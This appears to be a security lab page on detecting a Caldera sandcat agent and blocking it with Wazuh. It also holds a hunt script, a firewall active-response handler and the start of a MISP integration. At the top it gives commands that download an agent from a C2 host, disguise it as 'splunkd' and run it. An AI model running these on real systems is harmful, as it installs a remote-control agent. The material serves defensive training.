# Caldera sandcat agent deploy command (Linux): fetch the agent from the C2 server,
# write it to disk under the name "splunkd", and start it
server="http://evil.socfortress.co:8888";
# the "file" and "platform" headers tell the Caldera server which agent build to return
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
# run the agent against the C2 server and join the "red" group
./splunkd -server $server -group red -v
# Caldera sandcat agent deploy command (Windows, PowerShell): download the agent build,
# drop it in C:\Users\Public under the name the server supplies, and replace any running copy
$server="http://evil.socfortress.co:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
# the "platform" and "file" headers select the agent build, as in the Linux command
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
# take the on-disk name from the Content-Disposition response header (quotes stripped)
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
# kill any process that has the old binary loaded, delete it, then write the new one
get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;
rm -force "C:\Users\Public\$name.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;
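The deploy commands above give the defender two concrete artefacts to hunt for: a binary executing out of C:\Users\Public, and a process carrying a Splunk-style name from a path that is not a Splunk install directory. The following is an added hunt script, not code from the original page or from Caldera; the drop directory, the name pattern and the Splunk install paths are assumptions taken from the commands above and from default Splunk layouts.

```powershell
# Added example: hunt for a staged sandcat agent on a Windows host.
# Assumptions (not from the page): the drop directory and name pattern used by the
# deploy command above, and the two default Splunk install paths listed here.
$DropDir    = "C:\Users\Public\"
$SplunkDirs = @("C:\Program Files\Splunk\", "C:\Program Files\SplunkUniversalForwarder\")

function Test-InSplunkDir([string]$Path) {
    foreach ($d in $SplunkDirs) {
        if ($Path.StartsWith($d, [System.StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

# snapshot established TCP connections once so each suspect can be joined to its peers
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($p in Get-Process) {
    if (-not $p.Path) { continue }   # system and protected processes expose no image path

    $inDrop   = $p.Path.StartsWith($DropDir, [System.StringComparison]::OrdinalIgnoreCase)
    $fakeName = ($p.ProcessName -like "splunk*") -and -not (Test-InSplunkDir $p.Path)
    if (-not ($inDrop -or $fakeName)) { continue }

    # a freshly compiled sandcat binary carries no Authenticode signature
    $sig   = Get-AuthenticodeSignature -FilePath $p.Path
    $peers = $connections | Where-Object { $_.OwningProcess -eq $p.Id } |
             ForEach-Object { "{0}:{1}" -f $_.RemoteAddress, $_.RemotePort }

    [PSCustomObject]@{
        Pid       = $p.Id
        Name      = $p.ProcessName
        Path      = $p.Path
        Signature = $sig.Status       # "NotSigned" for an unsigned dropper
        Peers     = ($peers -join ", ")
    }
}
```

Run it in an elevated PowerShell session so that Get-Process can read the image path of processes owned by other users; a hit whose Peers column points at port 8888 on an unfamiliar host is the beacon from the deploy command above.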
################################
##Script to add/remove destination ip to windows firewall
################################
##########
##info@opensecure.co
##########
# Read the Alert that triggered the Active Response on the manager and convert the JSON to an object
$INPUT_JSON = Read-Host
$INPUT_ARRAY = $INPUT_JSON | ConvertFrom-Json
$INPUT_ARRAY = $INPUT_ARRAY | ConvertFrom-Json
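The script above is shown only up to the point where it has parsed the active-response message. What follows is an added example of a complete handler in the same role, written for this page rather than taken from the original windowsfirewall.ps1 or from Wazuh. It assumes the Wazuh 4.x active-response JSON format on stdin (a top-level "command" of "add" or "delete" and the triggering alert under "parameters.alert"), that the alert is a Sysmon network-connection event whose peer address sits at data.win.eventdata.destinationIp, and the rule-name prefix and log path shown; all of these are assumptions, not facts taken from the page.

```powershell
# Added example (not the page's windowsfirewall.ps1): block or unblock the destination IP
# from a Sysmon network-connection alert, driven by the Wazuh active-response message.
# Assumptions: Wazuh 4.x JSON on stdin, IP at parameters.alert.data.win.eventdata.destinationIp,
# the rule-name prefix and the log file path below.
$RulePrefix = "Wazuh-AR-Block-"
$LogFile    = "C:\Program Files (x86)\ossec-agent\active-response\active-responses.log"

function Write-ArLog([string]$Message) {
    $line = "{0} {1}" -f (Get-Date -Format "yyyy/MM/dd HH:mm:ss"), $Message
    Add-Content -Path $LogFile -Value $line -ErrorAction SilentlyContinue
}

# read the whole message from stdin and parse it once
$raw = [Console]::In.ReadToEnd()
try {
    $msg = $raw | ConvertFrom-Json
} catch {
    Write-ArLog "windowsfirewall.ps1: cannot parse input: $raw"
    exit 1
}

$command = $msg.command            # "add" when the rule fires, "delete" when the timeout expires
$ip      = $msg.parameters.alert.data.win.eventdata.destinationIp

# Never build a firewall rule from an unvalidated alert field: require a literal IP address
# and refuse loopback/unspecified addresses, which would cut the host off from itself
$parsed = $null
if (-not [System.Net.IPAddress]::TryParse($ip, [ref]$parsed) -or
    [System.Net.IPAddress]::IsLoopback($parsed) -or
    $ip -eq "0.0.0.0" -or $ip -eq "::") {
    Write-ArLog "windowsfirewall.ps1: refusing to act on destination '$ip'"
    exit 1
}
$ip       = $parsed.ToString()     # canonical form, so add and delete name the same rule
$ruleName = $RulePrefix + $ip

switch ($command) {
    "add" {
        # idempotent: a repeated alert for the same peer must not stack duplicate rules
        if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $ruleName -Direction Outbound `
                -RemoteAddress $ip -Action Block -Profile Any | Out-Null
        }
        Write-ArLog "windowsfirewall.ps1: blocked outbound traffic to $ip (rule $ruleName)"
    }
    "delete" {
        Remove-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue
        Write-ArLog "windowsfirewall.ps1: removed block for $ip (rule $ruleName)"
    }
    default {
        Write-ArLog "windowsfirewall.ps1: unknown command '$command'"
        exit 1
    }
}
```

The validation step is the part worth keeping whatever the surrounding script looks like: the address comes from event data that the monitored host produced, so the handler should only ever pass a parsed IP, never the raw string, into the firewall cmdlet, and it should refuse values that would block the host from itself or match everything.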
:: Simple script to run Windows Firewall Block
:: The script executes a powershell script and appends output.
@ECHO OFF
ECHO.
"C:\Program Files\PowerShell\7\pwsh.exe" -executionpolicy ByPass -File "C:\Program Files (x86)\ossec-agent\active-response\bin\windowsfirewall.ps1"
:Exit
#!/var/ossec/framework/python/bin/python3
## MISP API Integration
#
import sys
import os
from socket import socket, AF_UNIX, SOCK_DGRAM
from datetime import date, datetime, timedelta
import time
import requests
from requests.exceptions import ConnectionError